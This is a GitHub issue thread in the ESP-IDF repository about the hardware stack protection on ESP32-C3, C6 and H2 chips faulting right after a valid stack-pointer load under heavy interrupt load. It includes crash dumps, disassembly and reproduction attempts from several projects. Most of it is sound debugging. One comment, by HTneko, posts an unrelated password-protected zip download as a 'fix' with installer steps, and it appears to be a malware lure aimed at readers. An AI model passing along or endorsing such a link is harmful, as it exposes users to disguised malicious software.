espressif/esp-idf #14456: ESP32-C3 Stack Protection Debug Assist module triggering on SP load

projectgus, 2024-08-28:
### Answers checklist.

- [X] I have read the documentation [ESP-IDF Programming Guide](https://docs.espressif.com/projects/esp-idf/en/latest/) and the issue is not addressed there.
- [X] I have updated my IDF branch (master or release) to the latest version and checked that the issue is present there.
- [X] I have searched the issue tracker for a similar issue and not found a similar issue.

### IDF version.

v5.2.2, also v5.2.2-639-g43098fc4de

### Espressif SoC revision.

ESP32-C3 (QFN32) (revision v0.4)

### Operating System used.

Linux

### How did you build your project?

Command line with idf.py

### If you are using Windows, please specify command line type.

None

### Development Kit.

SEEED XIAO ESP32-C3

### Power Supply used.

USB

### What is the expected behavior?

Load SP register with a valid address (inside the current task's stack region) without Debug Assist hardware Stack Protection triggering.

### What is the actual behavior?

Loading the SP register seems to intermittently trigger a hardware stack protector interrupt. All of the reported addresses look valid for the running task, i.e. there was no stack overflow or SP corruption.

### Steps to reproduce.

Reproduction currently requires the MicroPython master branch and some Python code that sends a lot of data over Wi-Fi. (The original bug is https://github.com/micropython/micropython/issues/15667)

It is probably possible to make a simpler reproducer, best guess is that the key features are:

* Frequent context switches and/or interrupts (or maybe something else to do with Wi-Fi activity, but guess interrupts).
* Execution in the task is jumping around using a setjmp/longjmp style mechanism. For MicroPython this is "native NLR" implemented here: https://github.com/micropython/micropython/blob/master/py/nlrrv32.c#L53 however the original issue report was using libc setjmp/longjmp.

Note that all of the jumps are happening within the same task, and the stack pointer is saved and restored each time to/from a valid value for the current executing task.

### Debug Logs.

```plain
Here's a sample crash:

MPY version : v1.24.0-preview.201.g24aa8ed762.dirty on 2024-08-28
IDF version : v5.2.2
Machine     : ESP32C3 module with ESP32C3

Guru Meditation Error: Core  0 panic'ed (Stack protection fault). 

Detected in task "mp_task" at 0x4200b1ee
0x4200b1ee: nlr_jump at /home/gus/ry/george/micropython/py/nlrrv32.c:55

Stack pointer: 0x3fca7ff0
Stack bounds: 0x3fca43a4 - 0x3fca83a0

Core  0 register dump:
Stack dump detected
MEPC    : 0x4200b200  RA      : 0x403829fa  SP      : 0x3fca7ff0  GP      : 0x3fc96e00  
0x4200b200: nlr_jump at /home/gus/ry/george/micropython/py/nlrrv32.c:55
0x403829fa: mp_execute_bytecode at /home/gus/ry/george/micropython/py/vm.c:285

TP      : 0x3fc6b838  T0      : 0x3fca7fa0  T1      : 0x40390f52  T2      : 0x0000003f  
0x40390f52: vTaskSuspend at /home/gus/ry/george/esp-idf-v5/components/freertos/FreeRTOS-Kernel/tasks.c:1960 (discriminator 1)

S0/FP   : 0x3fcabbe0  S1      : 0x3fcabc30  A0      : 0x3fca8010  A1      : 0x00000054  
A2      : 0x00000000  A3      : 0x3fcc99c0  A4      : 0x3fcc99c0  A5      : 0x3fca80e0  
A6      : 0x00000002  A7      : 0x21400000  S2      : 0x3c17034c  S3      : 0x3fcc9950  
S4      : 0x00000001  S5      : 0x00000062  S6      : 0x00000068  S7      : 0x3c16dc1c  
S8      : 0x0000001b  S9      : 0x3c16e000  S10     : 0x3c178419  S11     : 0x3c1781b6  
T3      : 0x00000000  T4      : 0x0003877f  T5      : 0x00000003  T6      : 0x00000001  
MSTATUS : 0x00001881  MTVEC   : 0x40380001  MCAUSE  : 0x0000001b  MTVAL   : 0x00004505  
0x40380001: _vector_table at ??:?

MHARTID : 0x00000000  

Backtrace:

0x4200b200 in nlr_jump (val=0x3fcabc30) at /home/gus/ry/george/micropython/py/nlrrv32.c:55
55          __asm volatile (
#0  0x4200b200 in nlr_jump (val=0x3fcabc30) at /home/gus/ry/george/micropython/py/nlrrv32.c:55
#1  0x00000000 in ?? ()
Backtrace stopped: frame did not save the PC
ELF file SHA256: 7e6b188d6
```

Note that the Stack pointer address in the dump is valid for the bounds of the task.

This crash dump was created with a couple of additions in the nlr_jump function to try and get extra debug info:

200b184 <nlr_jump>:
        "sw   x2, 60(x10)       \n" // Store SP.
        "jal  x0, nlr_push_tail \n" // Jump to the C part.
        );
}

NORETURN void nlr_jump(void *val) {
4200b184:       1141                    addi    sp,sp,-16
4200b186:       c226                    sw      s1,4(sp)
4200b188:       c04a                    sw      s2,0(sp)
4200b18a:       c606                    sw      ra,12(sp)
4200b18c:       84aa                    mv      s1,a0
    MP_NLR_JUMP_HEAD(val, top)
4200b18e:       dc1fc0ef                jal     ra,42007f4e <mp_thread_get_state>
4200b192:       01452903                lw      s2,20(a0)
4200b196:       c422                    sw      s0,8(sp)
4200b198:       00091563                bnez    s2,4200b1a2 <nlr_jump+0x1e>
4200b19c:       8526                    mv      a0,s1
4200b19e:       ec2fa0ef                jal     ra,42005860 <nlr_jump_fail>
4200b1a2:       842a                    mv      s0,a0
4200b1a4:       00992223                sw      s1,4(s2)
4200b1a8:       854a                    mv      a0,s2
4200b1aa:       71a420ef                jal     ra,4204d8c4 <nlr_call_jump_callbacks>
4200b1ae:       00092783                lw      a5,0(s2)
4200b1b2:       c85c                    sw      a5,20(s0)
    __asm volatile (
4200b1b4:       854a                    mv      a0,s2
4200b1b6:       000102b3                add     t0,sp,zero  // Note: stored pre-restore SP to t0
4200b1ba:       00852083                lw      ra,8(a0)
4200b1be:       4540                    lw      s0,12(a0)
4200b1c0:       4904                    lw      s1,16(a0)
4200b1c2:       01452903                lw      s2,20(a0)
4200b1c6:       01852983                lw      s3,24(a0)
4200b1ca:       01c52a03                lw      s4,28(a0)
4200b1ce:       02052a83                lw      s5,32(a0)
4200b1d2:       02452b03                lw      s6,36(a0)
4200b1d6:       02852b83                lw      s7,40(a0)
4200b1da:       02c52c03                lw      s8,44(a0)
4200b1de:       03052c83                lw      s9,48(a0)
4200b1e2:       03452d03                lw      s10,52(a0)
4200b1e6:       03852d83                lw      s11,56(a0)
4200b1ea:       03c52103                lw      sp,60(a0)
4200b1ee:       0001                    nop  // <-- address the Debug Assist reports
4200b1f0:       0001                    nop
4200b1f2:       0001                    nop
4200b1f4:       0001                    nop
4200b1f6:       0001                    nop
4200b1f8:       0001                    nop
4200b1fa:       0001                    nop
4200b1fc:       0001                    nop
4200b1fe:       0001                    nop
4200b200:       4505                    li      a0,1  // <-- MEPC when the protection actually triggers
4200b202:       00008067                ret
```

* The debug assist always points to the instruction after loading SP as the one which triggered protection.
* Adding the `add     t0,sp,zero` means temp register t0 holds the "before restore" SP value. Note that it's also in range for the task's stack.
* Note that neither SP value is close to the stack limit. I doubled the task stack size and re-tested just in case, it crashes the same.
* Adding the NOPs at the end means that the exception registr dump is valid for the values at the time of the failure (otherwise it triggers a couple of instructions after returning which makes it harder to follow). This is also why the Backtrace doesn't work here (the SP doesn't point to the executing frame). The stack isn't corrupt though, if you take the NOPs out then the Backtrace is correct.
```

### More Information.

* Suspect (gut feeling) that a context switch or an interrupt that triggers immediately before or after the `lw      sp,60(a0)` instruction is causing the stack protection to trigger.
* Tried some naive patches in `components/esp_system/port/include/private/esp_private/hw_stack_guard.h` such as adding `fence` instructions and big `nop` blocks at the end of `ESP_HW_STACK_GUARD_MONITOR_STOP_CPU0` and `ESP_HW_STACK_GUARD_MONITOR_START_CPU0` macros, in case there was some race with the Debug Assist registers changing during a context switch. Still crashes, however I don't really know what I'm doing there.
* Have NOT tried disabling interrupts inside `nlr_jump`. That seems like a possible workaround but also doesn't seem like it should be necessary...?

Happy to try anything you recommend, might even be able to provide a C reproducer that uses setjmp/longjmp.

HTneko, 2024-08-28:
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

Lapshin, 2024-08-30:
Hi @projectgus , thank you for reporting!

That's a bizarre bug you caught. Could you please provide a reproducer?

<details>
  <summary>I tried to reproduce it with this code + holding a key pressed :D (click to expand)</summary>
  

```C
#include <stdio.h>
#include <inttypes.h>
#include "sdkconfig.h"
#include "freertos/FreeRTOS.h"
#include "freertos/task.h"
#include "esp_chip_info.h"
#include "esp_flash.h"
#include "esp_system.h"
#include "esp_intr_alloc.h"
#include "soc/periph_defs.h"
#include "hal/uart_ll.h"

void interrupt_handler(__attribute__((unused)) void *)
{
    int fifolen = uart_ll_get_rxfifo_len(&UART0);
    while (fifolen != 0) {
        unsigned char data;
        uart_ll_read_rxfifo(&UART0, &data, 1);
        fifolen--;
    }
    uart_ll_clr_intsts_mask(&UART0, UART_INTR_RXFIFO_FULL | UART_INTR_RXFIFO_TOUT);
}

void app_main(void) {
    esp_intr_alloc(ETS_UART0_INTR_SOURCE, 0, interrupt_handler, NULL, NULL);
    while (1) {
        asm volatile("add t0,sp,zero");
        asm volatile("sw sp,16(t0)");
        asm volatile("addi sp,sp,-100");
        asm volatile("nop");
        asm volatile("nop");
        asm volatile("lw sp,16(t0)");
        vTaskDelay(50 / portTICK_PERIOD_MS);
    }
}
```
</details>

But could not reproduce it with v5.2.2 (3b8741b172)

gerekon, 2024-08-30:
Can we dump debug assist config t the point of crash? @Lapshin I think it could be useful to add this to panic output. Basing on protected addresses we can try to determine which task/interrupt it is configured for.

projectgus, 2024-09-03:
@Lapshin I haven't had any luck yet either, maybe it actually requires high Wi-Fi traffic. Will keep at it and let you know.

dhalbert, 2024-10-23:
We ran into what seems like the same problem in CircuitPython: https://github.com/adafruit/circuitpython/issues/9735 (see a simple test program there), and fixed it with `CONFIG_ESP_SYSTEM_HW_STACK_GUARD=n` for ESP32-C3 and ESP32-C6: https://github.com/adafruit/circuitpython/pull/9748, after seeing MicroPython's fix for this.

mi-hol, 2025-02-18:
> Could you please provide a reproducer?

@Lapshin https://github.com/ottelo9/tasmota-sml-script/issues/1#issuecomment-2543866362 has a script to reproduce the issue on Tasmota 14.3.
Would that help?

Lapshin, 2025-02-19:
@mi-hol , does this reproducer have a 100% chance of reproducing without waiting hours?

mi-hol, 2025-02-23:
@ottelo9 , could you please comment regarding the waiting time required to see the error using your script?

ottelo9, 2025-02-24:
@Lapshin I used this test script to produce the reboots every ~5min with Tasmota 14.3.0.

[Reboot Test Script C3 C6.txt](https://github.com/user-attachments/files/18948561/Reboot.Test.Script.C3.C6.txt)

mi-hol, 2025-03-09:
@Lapshin did the reproduction script help to find the root cause?

Lapshin, 2025-03-10:
@mi-hol , sorry, I did not have time to take a look. I will share update when I have one

chbmuc, 2026-11-12:
I think I ran into the same issue on an ESP32-C6, ESP-IDF v6.0.3, with no setjmp/longjmp involved: the SP load is the
epilogue of a function with a variable-length array, inside the prebuilt esp-zigbee-lib 2.0.5.

- Zigbee coordinator + Wi-Fi STA (coexistence, one antenna) + Matter
- Compile options: `-Os`, `CONFIG_ESP_SYSTEM_HW_STACK_GUARD=y`, `CONFIG_FREERTOS_HZ=1000`
- The function runs every 15 s (NWK link status). The panic only happens every few days.

```
Stack protection fault, task zigbee_main (6144-byte stack)
stack bounds   0x40850c4c .. 0x40852440
sp             0x40852270   (in bounds, 464 bytes below the top)
ASSIST_DEBUG pc 0x42075f6e  (instruction after the SP load)
mepc           0x42072b74   (entry of the next callee, nwk_fwd_send_msg_delayed)
mcause 27, mtval 0x00001101

42075f64:  jal   zmsg_write_bytes
42075f68:  lui   a5,0x1
42075f6a:  lw    sp,-84(s0)        <- restores sp after the VLA
42075f6e:  add   s6,s6,a5          <- reported pc
42075f70:  sh    s5,-1276(s6)
42075f78:  jal   nwk_fwd_send_msg_delayed
```

Call path: `esp_zigbee_launch_mainloop` → `esp_zigbee_platform_alarm_process` →
`tasklet_sched_process` → `tm_sched_process_timers_task` → `nwk_link_mngr_send_link_status_cmd`.

The trigger seems to be a plain `lw sp, off(s0)` to a valid in-bounds value, under heavy Wi-Fi/802.15.4 interrupt load.

technosf, 2026-11-15:
Another data point, on a different chip, a newer IDF and a compiler-generated stack-pointer restore.

**Setup:** ESP32-H2 (Waveshare ESP32-H2-Zero), ESP-IDF v6.1, esp-zigbee-lib 2.0.5 running as a Zigbee router, with NimBLE passive scanning at the same time. `CONFIG_ESP_SYSTEM_HW_STACK_GUARD=y` (the default). The board panics with "Stack protection fault" (mcause 0x1b) about once a day.

**Where:** two core dumps point to the Zigbee task, inside `nwk_link_mngr_send_link_status_cmd`, the router's periodic Link Status timer. That function saves SP, carves a fixed 112-byte block off the stack, then restores SP from memory:

    42090afe  sw    sp,-84(s0)       # save sp
    42090b64  c.addi16sp sp,-112     # scoped 112-byte block
    ...
    42090bcc  jal   ...              # call returns here
    42090bd0  c.lui a5,1             # RA
    42090bd2  lw    sp,-84(s0)       # restore sp
    42090bd6  c.add s6,a5
    42090bd8  sh    s5,-1276(s6)
    42090bdc  c.li  a1,0
    42090bde  c.mv  a0,s3
    42090be0  jal   ...              # MEPC

**Register state:** MEPC is 5 instructions after the `lw sp`. MTVAL is `0xc83fc0ef`, which is the encoding of the `jal` at MEPC, not an address. That matches the original report, where MTVAL held the instruction at MEPC. mstatus is 0x1881.

**SP was in bounds** (read from the task's TCB in the dump):
- Stack (pxStack .. pxEndOfStack): 0x4082bed4 .. 0x4082e6d0, 10 KB.
- SP at the fault: 0x4082e580, the value just loaded. That is 9,900 bytes above the bottom. Before the load, SP was 0x4082e510, also in range.
- The whole function uses about 210 bytes of stack.

An earlier dump, with a 6 KB stack, had 5,724 bytes free at the same instruction. Growing the stack from 6 KB to 10 KB made no difference, the same as the original report's "doubling the stack changes nothing".

So, as in the original report, the guard fires right after SP is loaded from memory with an in-range value, here a plain `lw sp` emitted by the compiler (in a closed-source library), under radio interrupt load (802.15.4 plus BLE).

gerekon, 2026-11-16:
Hi @technosf 

Is it possible to share the whole disassembly for that function or app binary?

gerekon, 2026-11-16:
@technosf Unfortunately I can not build Zigbee example `examples/zigbee/esp_zigbee_gateway` on IDF 6.1 (neither on IDF 6.1.1) with `esp-zigbee-lib 2.0.5`.  It requires `1.6.8` which has no `nwk_link_mngr_send_link_status_cmd`. If I force dependency to 2.0.5 build fails with missed headers.

If I build that example on `master` branch disassembly is different with what you posted. I suppose because GNU toolchain has been upgraded from 15.2.0 to 16.1.0.

So can I ask you to post full dissasembly of that function?

technosf, 2026-11-16:
Dump of assembler code for function nwk_link_mngr_send_link_status_cmd:

```
   0x42090a9c <+0>:	711d              	addi	sp,sp,-96
   0x42090a9e <+2>:	cca2              	sw	s0,88(sp)
   0x42090aa0 <+4>:	ce86              	sw	ra,92(sp)
   0x42090aa2 <+6>:	caa6              	sw	s1,84(sp)
   0x42090aa4 <+8>:	c8ca              	sw	s2,80(sp)
   0x42090aa6 <+10>:	c6ce              	sw	s3,76(sp)
   0x42090aa8 <+12>:	c4d2              	sw	s4,72(sp)
   0x42090aaa <+14>:	c2d6              	sw	s5,68(sp)
   0x42090aac <+16>:	c0da              	sw	s6,64(sp)
   0x42090aae <+18>:	de5e              	sw	s7,60(sp)
   0x42090ab0 <+20>:	dc62              	sw	s8,56(sp)
   0x42090ab2 <+22>:	da66              	sw	s9,52(sp)
   0x42090ab4 <+24>:	d86a              	sw	s10,48(sp)
   0x42090ab6 <+26>:	d66e              	sw	s11,44(sp)
   0x42090ab8 <+28>:	1080              	addi	s0,sp,96
   0x42090aba <+30>:	ed7ff0ef        	jal	0x42090990 <nwk_is_router_started>
   0x42090abe <+34>:	e909              	bnez	a0,0x42090ad0 <nwk_link_mngr_send_link_status_cmd+52>
   0x42090ac0 <+36>:	4681              	li	a3,0
   0x42090ac2 <+38>:	4601              	li	a2,0
   0x42090ac4 <+40>:	4581              	li	a1,0
   0x42090ac6 <+42>:	4501              	li	a0,0
   0x42090ac8 <+44>:	fe77f097        	auipc	ra,0xfe77f
   0x42090acc <+48>:	4f2080e7        	jalr	1266(ra) # 0x4080ffba <__assert_func>
   0x42090ad0 <+52>:	02700513        	li	a0,39
   0x42090ad4 <+56>:	928f50ef        	jal	0x42085bfc <zmsg_alloc>
   0x42090ad8 <+60>:	89aa              	mv	s3,a0
   0x42090ada <+62>:	10050563        	beqz	a0,0x42090be4 <nwk_link_mngr_send_link_status_cmd+328>
   0x42090ade <+66>:	a11f50ef        	jal	0x420864ee <core_globals_get>
   0x42090ae2 <+70>:	6485              	lui	s1,0x1
   0x42090ae4 <+72>:	9526              	add	a0,a0,s1
   0x42090ae6 <+74>:	b0654b83        	lbu	s7,-1274(a0)
   0x42090aea <+78>:	a05f50ef        	jal	0x420864ee <core_globals_get>
   0x42090aee <+82>:	9526              	add	a0,a0,s1
   0x42090af0 <+84>:	b0455a03        	lhu	s4,-1276(a0)
   0x42090af4 <+88>:	9fbf50ef        	jal	0x420864ee <core_globals_get>
   0x42090af8 <+92>:	4581              	li	a1,0
   0x42090afa <+94>:	8b2a              	mv	s6,a0
   0x42090afc <+96>:	854e              	mv	a0,s3
   0x42090afe <+98>:	fa242623        	sw	sp,-84(s0)
   0x42090b02 <+102>:	976f50ef        	jal	0x42085c78 <zmsg_set_offset>
   0x42090b06 <+106>:	f7cf90ef        	jal	0x4208a282 <nwk_get_short_address>
   0x42090b0a <+110>:	4785              	li	a5,1
   0x42090b0c <+112>:	6641              	lui	a2,0x10
   0x42090b0e <+114>:	4801              	li	a6,0
   0x42090b10 <+116>:	85aa              	mv	a1,a0
   0x42090b12 <+118>:	873e              	mv	a4,a5
   0x42090b14 <+120>:	86be              	mv	a3,a5
   0x42090b16 <+122>:	1671              	addi	a2,a2,-4 # 0xfffc
   0x42090b18 <+124>:	854e              	mv	a0,s3
   0x42090b1a <+126>:	d27ff0ef        	jal	0x42090840 <nwk_frame_write_hdr>
   0x42090b1e <+130>:	9d1f50ef        	jal	0x420864ee <core_globals_get>
   0x42090b22 <+134>:	9526              	add	a0,a0,s1
   0x42090b24 <+136>:	9d954783        	lbu	a5,-1575(a0)
   0x42090b28 <+140>:	fbc40693        	addi	a3,s0,-68
   0x42090b2c <+144>:	4605              	li	a2,1
   0x42090b2e <+146>:	00178713        	addi	a4,a5,1
   0x42090b32 <+150>:	9ce50ca3        	sb	a4,-1575(a0)
   0x42090b36 <+154>:	459d              	li	a1,7
   0x42090b38 <+156>:	854e              	mv	a0,s3
   0x42090b3a <+158>:	faf40e23        	sb	a5,-68(s0)
   0x42090b3e <+162>:	c1cf50ef        	jal	0x42085f5a <zmsg_write_bytes>
   0x42090b42 <+166>:	47a1              	li	a5,8
   0x42090b44 <+168>:	fbc40613        	addi	a2,s0,-68
   0x42090b48 <+172>:	4585              	li	a1,1
   0x42090b4a <+174>:	854e              	mv	a0,s3
   0x42090b4c <+176>:	faf40e23        	sb	a5,-68(s0)
   0x42090b50 <+180>:	c68f50ef        	jal	0x42085fb8 <zmsg_append_bytes>
[... 158 lines cut ...]
   0x42090d38 <+668>:	993e              	add	s2,s2,a5
   0x42090d3a <+670>:	00095a83        	lhu	s5,0(s2)
   0x42090d3e <+674>:	b59d              	j	0x42090ba4 <nwk_link_mngr_send_link_status_cmd+264>
   0x42090d40 <+676>:	000c5783        	lhu	a5,0(s8)
   0x42090d44 <+680>:	fbc40613        	addi	a2,s0,-68
   0x42090d48 <+684>:	458d              	li	a1,3
   0x42090d4a <+686>:	faf41e23        	sh	a5,-68(s0)
   0x42090d4e <+690>:	002c4783        	lbu	a5,2(s8)
   0x42090d52 <+694>:	854e              	mv	a0,s3
   0x42090d54 <+696>:	0905              	addi	s2,s2,1
   0x42090d56 <+698>:	faf40f23        	sb	a5,-66(s0)
   0x42090d5a <+702>:	0ff97913        	zext.b	s2,s2
   0x42090d5e <+706>:	a5af50ef        	jal	0x42085fb8 <zmsg_append_bytes>
   0x42090d62 <+710>:	0c11              	addi	s8,s8,4
   0x42090d64 <+712>:	b589              	j	0x42090ba6 <nwk_link_mngr_send_link_status_cmd+266>
   0x42090d66 <+714>:	f88f50ef        	jal	0x420864ee <core_globals_get>
   0x42090d6a <+718>:	6785              	lui	a5,0x1
   0x42090d6c <+720>:	ae478793        	addi	a5,a5,-1308 # 0xae4
   0x42090d70 <+724>:	04000613        	li	a2,64
   0x42090d74 <+728>:	4581              	li	a1,0
   0x42090d76 <+730>:	953e              	add	a0,a0,a5
   0x42090d78 <+732>:	b56d              	j	0x42090c22 <nwk_link_mngr_send_link_status_cmd+390>
```

End of assembler dump.